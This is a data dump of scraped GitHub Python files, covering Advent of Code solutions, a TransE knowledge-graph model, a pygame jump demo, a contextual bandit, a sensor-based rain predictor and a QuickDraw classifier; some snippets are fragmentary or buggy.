len(nums[0])\n for i in range(bits):\n temp = []\n count = 0\n\n for number in nums:\n if number[i] == \"1\":\n count += 1\n\n if count >= len(nums) / 2: # Mehrheit 1\n temp += [n for n in nums if (b and n[i] == \"1\") or (not b and n[i] == \"0\")]\n\n else: # Mehrheit 0\n temp += [n for n in nums if (b and n[i] == \"0\") or (not b and n[i] == \"1\")]\n\n nums = temp\n if len(nums) == 1:\n return int(nums[0], 2)\n\n\ndef main(file: str) -> int:\n with open(file, \"r\") as f:\n nums = [str(line).strip() for line in f]\n\n oxygen = filter_bits(nums, True)\n c02 = filter_bits(nums, False)\n return oxygen * c02\n\n\nif __name__ == '__main__':\n print(main('input.txt'))\n","repo_name":"NilsDeckert/Advent-of-code","sub_path":"2021/Day 3 - 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29277363769","text":"from core.classes.Deck import Deck\n\n\nclass ValuesRatioLister:\n\n def __init__(self, ratio: float):\n self.__ratio = ratio\n\n def __get_ratio(self):\n return self.__ratio\n\n def __set_ratio(self, ratio):\n self.__ratio = ratio\n\n ratio = property(__get_ratio, __set_ratio)\n\n def get_values_ratio_list(self, values, available_cases=100):\n \"\"\"\n this function return integer list that contains that\n allocates values according to the ratio\n \"\"\"\n result = []\n\n if not values:\n return None\n if len(values) == 1 or self.__ratio == 1:\n return [values[0]] * available_cases\n\n cases_to_take = round(available_cases * self.__ratio)\n if available_cases - cases_to_take <= 1:\n if cases_to_take > 1:\n cases_to_take -= 1\n result += [values[0]] * cases_to_take\n\n if len(values) > 1:\n values.pop(0)\n result += self.get_values_ratio_list(values, available_cases - cases_to_take)\n\n return 
result\n","repo_name":"Mikadows/AnkiLike","sub_path":"core/utils/ValuesRatioLister.py","file_name":"ValuesRatioLister.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19014481323","text":"import numpy as np\nfrom utils import readFileReturnList, listElemStr2Int\nimport time\nimport cv2\n\ndef main():\n width = 1000\n height = 1000\n\n field = np.zeros([width,height])\n img = np.zeros([width,height,3])\n for i in range(width):\n for j in range(height):\n if field[i][j] == 0:\n img[i][j] = (0,0,0)\n elif field[i][j] == 1:\n img[i][j] = (0,255,0)\n else:\n img[i][j] = (0,0,255)\n #lines = readFileReturnList(\"Day5_input_sample\")\n lines = readFileReturnList(\"Day5_input\")\n \n for line in lines:\n line = line.replace(' -> ',',')\n line = line.split(',')\n line = listElemStr2Int(line)\n #print(line)\n xdiff = line[2] - line[0]\n ydiff = line[3] - line[1]\n if xdiff != 0:\n grad = ydiff/xdiff\n else:\n grad = 'inf'\n if(line[0] == line[2]): # x1 == x2\n if(line[1] > line[3]):\n for i in range(line[3],line[1]+1):\n field[line[0]][i] += 1\n else:\n for i in range(line[1],line[3]+1):\n field[line[0]][i] += 1\n elif(line[1] == line[3]): # y1 == y2\n if(line[0] > line[2]):\n for i in range(line[2],line[0]+1):\n field[i][line[1]] += 1\n else:\n for i in range(line[0],line[2]+1):\n field[i][line[1]] += 1\n #### below condition for part 2 ####\n # +45deg\n elif( (abs(xdiff) == abs(ydiff))\n & (grad < 0) ):\n diff = abs(xdiff)\n #print(line)\n #print(diff)\n for i in range(diff+1):\n field[min(line[0],line[2])+i][max(line[1],line[3])-i] += 1\n # -45deg\n elif( (abs(xdiff) == abs(ydiff))\n & (grad > 0) ):\n diff = abs(xdiff)\n #print(line)\n #print(diff)\n for i in range(diff+1):\n field[min(line[0],line[2])+i][min(line[1],line[3])+i] += 1\n #print(field.transpose())\n\n print(\"size of field = (%d, %d)\"%(width,height))\n result = 0\n img = np.zeros([width,height,3])\n field = field.transpose()\n for i in range(width):\n for j in range(height):\n if field[i][j] == 0:\n img[i][j] = (0,0,0)\n if i%2 == 0:\n img[i][j] += (30,30,30)\n if j%2 == 0:\n img[i][j] += (30,30,30) \n elif field[i][j] == 1:\n img[i][j] = (0,250,50)\n elif field[i][j] == 2:\n img[i][j] = (0,100,150)\n result += 1\n else:\n img[i][j] = (0,50,250)\n result += 1\n img = img/255\n print(result)\n #img = cv2.resize(img, dsize=(0,0), fx=20, fy=20, interpolation=cv2.INTER_NEAREST)\n #img = cv2.resize(img, dsize=(0,0), fx=0.5, fy=0.5, interpolation=cv2.INTER_LINEAR)\n cv2.imshow('field', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n exit()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mat0imaru/AoC","sub_path":"2021/Day5.py","file_name":"Day5.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14752687422","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 6 00:59:38 2020\r\n\r\n@author: pcstream\r\n\"\"\"\r\n\r\nfrom separa import separa as sep\r\n\r\ndef maiorpalavra(text):\r\n maior = \"\"\r\n desmenb = sep(text, ',')\r\n for i in desmenb:\r\n if len(i) > len(maior):\r\n maior = i\r\n return maior\r\n \r\n ","repo_name":"flashlan/Curso-Ciencia-da-Computacao-com-Python-Parte-2-Alternative-Solutions","sub_path":"maiorpalavra.py","file_name":"maiorpalavra.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"34612338555","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass TransE(nn.Module):\n def __init__(self, num_of_entities: int, num_of_relations: int, num_of_dimensions: int, norm: int = 2):\n super().__init__()\n self.norm = norm\n with torch.no_grad():\n self.entity_embeddings = nn.Embedding(num_of_entities, num_of_dimensions)\n self.entity_embeddings.weight.data.uniform_(-6 / num_of_dimensions ** 0.5, 6 / num_of_dimensions ** 0.5)\n\n self.relation_embeddings = nn.Embedding(num_of_relations, num_of_dimensions)\n self.relation_embeddings.weight.data.uniform_(-6 / num_of_dimensions ** 0.5, 6 / num_of_dimensions ** 0.5)\n self.relation_embeddings.weight.data = F.normalize(self.relation_embeddings.weight.data, p=2, dim=1)\n\n def forward(self, batch: torch.tensor, corrupted_batch: torch.tensor):\n # normalize entity embeddings\n with torch.no_grad():\n self.entity_embeddings.weight.data = F.normalize(self.entity_embeddings.weight.data, p=2, dim=1)\n\n # destructure batch into head_ids, relation_ids, tail_ids\n batch_head_ids = batch[:, 0]\n batch_relation_ids = batch[:, 1]\n batch_tail_ids = batch[:, 2]\n\n corr_batch_head_ids = corrupted_batch[:, 0]\n corr_batch_relation_ids = corrupted_batch[:, 1]\n corr_batch_tail_ids = corrupted_batch[:, 2]\n\n # get corresponding embeddings\n batch_head_embeddings = self.entity_embeddings(batch_head_ids)\n batch_relation_embeddings = self.relation_embeddings(batch_relation_ids)\n batch_tail_embeddings = self.entity_embeddings(batch_tail_ids)\n\n corr_batch_head_embeddings = self.entity_embeddings(corr_batch_head_ids)\n corr_batch_relation_embeddings = self.relation_embeddings(corr_batch_relation_ids)\n corr_batch_tail_embeddings = self.entity_embeddings(corr_batch_tail_ids)\n\n batch_energies = batch_head_embeddings + batch_relation_embeddings - batch_tail_embeddings\n corr_batch_energies = corr_batch_head_embeddings + corr_batch_relation_embeddings - corr_batch_tail_embeddings\n\n return batch_energies, corr_batch_energies\n","repo_name":"rlafraie/TransE","sub_path":"TransE.py","file_name":"TransE.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42656743287","text":"import time\nfrom sensors import bme280, tsl2561, lcd\nfrom ai.train import RainPrediction\nfrom util.data import normalize_sensors\n\n\ndef main():\n lcd_display = lcd.get_lcd()\n lcd_display.color = (255, 0, 0)\n rain_prediction = RainPrediction()\n rain_prediction.load_all_models()\n lcd_display.color = (0, 0, 255)\n while True:\n bme = bme280.get_sensor()\n tsl = tsl2561.get_sensor()\n data = {\n \"temperature\": bme.temperature,\n \"pressure\": bme.pressure,\n \"humidity\": bme.humidity,\n \"dewpoint\": bme.dewpoint,\n \"luminosity\": tsl.broadband,\n }\n\n if lcd_display.up_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_1h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 1h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.right_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_6h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 6h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.down_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction 
= rain_prediction.make_prediction(\n \"precipitation_12h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 12h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.left_button:\n lcd_display.clear()\n lcd_display.color = (255, 0, 0)\n prediction = rain_prediction.make_prediction(\n \"precipitation_24h\", normalize_sensors(data)\n )\n lcd_display.message = f'Prediction 24h:\\n{prediction}'\n time.sleep(2)\n lcd_display.color = (0, 0, 255)\n elif lcd_display.select_button:\n lcd_display.clear()\n lcd_display.color = (0, 0, 0)\n break\n else:\n lcd_display.message = f'T:{data[\"temperature\"]:.02f} H:{data[\"humidity\"]:.02f}\\nP:{data[\"pressure\"]:.02f} L:{data[\"luminosity\"]:05f}'\n time.sleep(0.1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pireu2/Rain-Prediction-Instrument","sub_path":"ai/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29358281748","text":"import sys\nimport pygame\n\nscreen = None\n# 게임 화면 크기\nscreen_width = 800\nscreen_height = 500\n\n# 색상\nWHITE = (255, 255, 255)\n\n# 속도와 질량 기본 값\nVELOCITY = 7 # 속도\nMASS = 2 # 질량\n\nclass Car:\n def __init__(self):\n self.image = None\n self.rect = None\n self.dx = 0\n self.dy = 0\n self.isJump = 0 # 바닥(0), 점프중 (1), 이중점프(2)\n self.v = VELOCITY # 속도\n self.m = MASS # 질량\n\n def load_car(self): # 자동차 이미지를 불러와 위치를 정한다.\n # 플레이어 차량\n self.image = pygame.image.load(\"assets/images/smallcar.png\")\n # 크기 조정\n self.image = pygame.transform.scale(self.image, (150, 57))\n self.rect = self.image.get_rect()\n self.rect.bottom = screen_height\n\n def draw_car(self): # 자동차를 스크린에 그리기\n screen.blit(self.image, [self.rect.x, self.rect.y])\n\n # x 좌표 이동 - 플레이어 자동차의 움직임 제어할 때 필요\n def move_x(self):\n self.rect.x += self.dx\n\n def check_screen(self): # 화면 밖으로 못 나가게 방지\n if self.rect.right > screen_width or self.rect.x < 0:\n self.rect.x -= self.dx\n print('check_screen', self.rect.bottom, screen_height, self.rect.y)\n if self.rect.bottom > screen_height or self.rect.y < 0:\n self.rect.y -= self.dy\n \n def jump(self, j): # 점프상태 변경\n self.isJump = j\n \n def doJump(self):\n # isJump 값이 0보다 큰지 확인\n if self.isJump > 0:\n # isJump 값이 2일 경우 속도를 리셋\n # 점프 한 상태에서 다시 점프를 위한 값\n\n # 이 코드를 주석처리하면 이중점프를 못한다.\n if self.isJump == 2:\n self.v = VELOCITY\n\n # 역학공식 계산 (F). 
F = 0.5 * mass * velocity^2.\n if self.v > 0:\n # 속도가 0보다 클때는 위로 올라감\n F = (0.5 * self.m * (self.v * self.v))\n else:\n # 속도가 0보다 작을때는 아래로 내려감\n F = -(0.5 * self.m * (self.v * self.v))\n\n # 좌표 수정 : 위로 올라가기 위해서는 y 좌표를 줄여준다.\n self.rect.y -= round(F)\n\n # 속도 줄여줌\n self.v -= 1\n\n # 바닥에 닿았을때, 변수 리셋\n if self.rect.bottom > screen_height:\n self.rect.bottom = screen_height\n self.isJump = 0\n self.v = VELOCITY\n\n\ndef main():\n global screen, screen_width, screen_height\n\n # pygame 초기화 및 스크린 생성\n pygame.init()\n screen = pygame.display.set_mode((screen_width, screen_height))\n pygame.display.set_caption(\"Jump Test\")\n\n clock = pygame.time.Clock()\n\n player = Car() # 플레이어 자동차 생성, player 라는 객체를 생성한다.\n player.load_car() # 자동차 이미지 로드\n\n playing = True\n\n while playing:\n keys = pygame.key.get_pressed() # 키가 눌린 상태 체크\n # 스페이스키가 눌려있고, isJump가 2라면 1로 변경한다.\n # 이 작업을 해주지 않으면 스페이스가 눌려있는 상태면 플레이어가 계속 위로 올라가게 된다.\n if (keys[pygame.K_SPACE]):\n if player.isJump == 2:\n player.jump(1)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n playing = False\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.KEYDOWN: # 키를 눌렀을 경우\n if event.key == pygame.K_RIGHT: # 방향키를 눌렀을 경우 자동차의 위치를 바꾼다.\n player.dx = 5\n elif event.key == pygame.K_LEFT:\n player.dx = -5\n \n # 스페이스키를 눌렀을 때,\n # 0이면 바닥인 상태 : 1로 변경\n # 1이면 점프를 한 상태 : 2로 변경, 점프한 위치에서 다시 점프를 하게 된다. 즉, 이중점프\n if event.key == pygame.K_SPACE:\n if player.isJump == 0: # 자동차가 바닥에 있으면\n player.jump(1)\n elif player.isJump == 1: # 현재 점핑 중일 경우\n player.jump(2)\n \n if event.type == pygame.KEYUP: # 키에서 손을 땔 경우\n if event.key == pygame.K_RIGHT:\n player.dx = 0\n elif event.key == pygame.K_LEFT:\n player.dx = 0\n\n screen.fill(WHITE) # 배경색을 흰색으로\n\n player.draw_car() # 자동차를 그린다.\n player.move_x()\n\n player.doJump() # 플레이어의 y 좌표를 움직여주는 메서드 추가, 점프하는 것\n player.check_screen() # 화면밖으로 나가지 않게 처리\n\n pygame.display.flip()\n clock.tick(60) # 초당 60번 실행\n\nif __name__ == '__main__':\n main()\n","repo_name":"wangta69/py_games","sub_path":"games/jump/step-05.py","file_name":"step-05.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"30051247264","text":"def answer(n):\n arr = []\n minSum = n\n while minSum:\n last = getMaxSq(minSum)\n minSum -= last\n if last == 0:\n arr.append(1)\n else:\n arr.append(last)\n \n return arr\n\ndef getMaxSq(n):\n i = 1\n lastSq = 0\n while 1:\n square = i ** 2\n if square >= n:\n break\n lastSq = square;\n i += 1\n\n if lastSq == 0:\n lastSq = 1\n\n return lastSq","repo_name":"Almo7aya/foo.bar-solution","sub_path":"py/level1.py","file_name":"level1.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30007593856","text":"import numpy as np \nimport torch\nfrom mab import eps_bandit\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\"\"\"\nDeep Q-network.\n\"\"\"\nclass DQN(torch.nn.Module):\n def __init__(self, state_dim, hidden_dim, num_actions):\n super(DQN, self).__init__()\n self.net = torch.nn.Sequential(\n torch.nn.Linear(state_dim, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, 32),\n torch.nn.ReLU(),\n torch.nn.Linear(32, num_actions))\n return \n\n def forward(self, x):\n if type(x) is not torch.Tensor:\n x = torch.tensor(x, device=DEVICE)\n y = self.net(x.float())\n return y\n\nclass contextual_bandit(eps_bandit):\n '''\n contextual 
epsilon-greedy k-bandit problem\n \n Inputs\n =====================================================\n k: number of arms (int)\n eps: probability of random action 0 < eps < 1 (float)\n iters: number of steps (int)\n mu: set the average rewards for each of the k-arms.\n Set to \"random\" for the rewards to be selected from\n a normal distribution with mean = 0. \n Set to \"sequence\" for the means to be ordered from \n 0 to k-1.\n Pass a list or array of length = k for user-defined\n values.\n '''\n \n def __init__(self, k, eps, iters, hidden_size, state_size, mu='random', learning_rate=0.5, qnet=None):\n # Number of arms\n self.k = k\n # Search probability\n self.eps = eps\n # Number of iterations\n self.iters = iters\n # Step count\n self.n = 0\n # Step count for each arm\n self.k_n = np.zeros(k)\n \n # Total mean reward\n self.mean_reward = 0\n \n # Mean reward for each arm\n self.reward = np.zeros(iters)\n \n self.hidden_size=hidden_size\n self.state_size=state_size\n \n self.neuralNet = DQN(state_dim=self.state_size, hidden_dim=self.hidden_size, num_actions=self.k).to(DEVICE)\n self.opt = torch.optim.Adam(params=self.neuralNet.parameters(), lr=learning_rate)\n self.loss_fn = torch.nn.SmoothL1Loss()\n \n if type(mu) == list or type(mu).__module__ == np.__name__:\n # User-defined averages \n self.mu = np.array(mu)\n elif mu == 'random':\n # Draw means from probability distribution\n self.mu = np.random.normal(0, 1, k)\n elif mu == 'sequence':\n # Increase the mean for each arm by one\n self.mu = np.linspace(0, k-1, k)\n\n np.random.seed(13)\n torch.manual_seed(13)\n \n def act(self, state, eps = 0):\n with torch.no_grad():\n self.neuralNet.eval()\n q_values = self.neuralNet(state)\n # Random action.\n if np.random.rand() < eps:\n nA = q_values.shape[-1]\n action = np.random.choice(nA)\n # Greedy policy.\n else:\n action = q_values.argmax().cpu().numpy()\n return action\n \n def learn(self, reward, state, action):\n # Update counts\n self.n += 1\n self.k_n[action] += 1\n \n # Update total\n self.mean_reward = self.mean_reward + (\n reward - self.mean_reward) / self.n\n\n self.neuralNet.train()\n q_values = self.neuralNet(state)\n y = q_values.max()\n\n # Update results for a_k\n with torch.no_grad():\n yhat = y + (reward - y) / self.k_n[action]\n yhat = yhat.reshape(y.shape).float()\n \n # # Back-propagation.\n self.opt.zero_grad()\n loss = self.loss_fn(y, yhat)\n loss.backward()\n self.opt.step()\n \n def incrementIters(self, increment): \n self.iters += int(increment)\n return\n\n def reset(self):\n # Resets results while keeping settings\n self.n = 0\n self.k_n = np.zeros(self.k)\n self.mean_reward = 0\n self.reward = np.zeros(self.iters)\n self.neuralNet = np.zeros(self.k)\n return","repo_name":"AdrianBaronHyppolite/Adrian-MmwaveSetup","sub_path":"python/contextualMab.py","file_name":"contextualMab.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19500728331","text":"def calculate(line, R, C, S, ro, rc, co, cc, so, sc):\n line_ro = line.count('(')\n line_rc = line.count(')')\n line_co = line.count('{')\n line_cc = line.count('}')\n line_so = line.count('[')\n line_sc = line.count(']')\n\n indent = R*(ro-rc) + C*(co-cc) + S*(so-sc)\n\n if ro+line_ro-rc != co+line_co-cc or ro+line_ro-rc != so+line_so-sc:\n return -1\n\n ro += line_ro\n rc += line_rc\n co += line_co\n cc += line_cc\n so += line_so\n sc += line_sc\n\n return indent\n\n\nwhile True:\n p, q = map(int, 
input().split())\n\n if p == q == 0:\n break\n\n ro = rc = co = cc = so = sc = 0\n\n for i in range(p):\n line = input().strip()\n indent = calculate(line, R, C, S, ro, rc, co, cc, so, sc)\n if indent == -1:\n print(-1)\n break\n print(indent)\n else:\n for i in range(q):\n line = input().strip()\n indent = calculate(line, R, C, S, ro, rc, co, cc, so, sc)\n if indent == -1:\n print(-1)\n break\n print(indent, end=' ')\n else:\n print()\n print(\"\\n\")\n","repo_name":"SeungAh-Hong/algorithm-study","sub_path":"Baekjoon/hyunjeong/스타일리시.py","file_name":"스타일리시.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"44"} +{"seq_id":"33597797071","text":"# s1 = pd.get_dummies()\r\n# for x in range(10):\r\n# s1.set_value(x, x ** 2)\r\n# print(s1)\r\n\r\n\r\nx = [2, 3, 4, 5, 6]\r\ny = [lambda v: v * 5 for v in x]\r\nfor i, val in enumerate(a):\r\n print(x)\r\n","repo_name":"bharatsdev/Machine-Learning-with-Python","sub_path":"ND2-finding_donors/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22286002745","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nfrom random import choice\nfrom PIL import Image\nimport base64\nimport pymongo\nimport io\nglobal scoretotal\nscoretotal = 0\n\ndef initialize():\n model = load_model('keras10objects.h5')\n f = open(\"categories.txt\", \"r\")\n classes = f.read().split('\\n')[:-1]\n f.close()\n return model, classes\n\n\ndef getObject(classes):\n\treturn choice(classes)\n\n\ndef predict(model, classes, image, category):\n global scoretotal\n image = base64.b64decode(image)\n image = Image.open(io.BytesIO(image)).convert('L').resize((28, 28))\n image = np.array(image).reshape(28, 28, 1).astype('float32')/255.0\n prediction = model.predict(np.expand_dims(image, axis=0))[0]\n print(prediction[classes.index(category)])\n if (prediction[classes.index(category)]) < 0.5:\n return [\"Failed\", 0, 0, category, scoretotal]\n ind = (-prediction).argsort()[:5]\n result = [classes[x] for x in ind]\n if (result.index(category)+1 == 1):\n score = 50\n elif (result.index(category)+1 == 2):\n score = 40\n elif (result.index(category)+1 == 3):\n score = 30\n elif (result.index(category)+1 == 4):\n score = 20\n elif (result.index(category)+1 == 5):\n score = 10\n else:\n score = 0\n scoretotal += score\n wordsList = [\"Perfect\", \"Excellent\", \"Very Good\", \"Good\", \"Average\"]\n try:\n return wordsList[result.index(category)], score, result.index(category)+1, category, scoretotal\n except ValueError:\n return [\"Failed\", 0, 0, category, scoretotal]\n","repo_name":"software-students-fall2022/containerized-app-exercise-team4","sub_path":"machine-learning-client/quickdraw.py","file_name":"quickdraw.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"}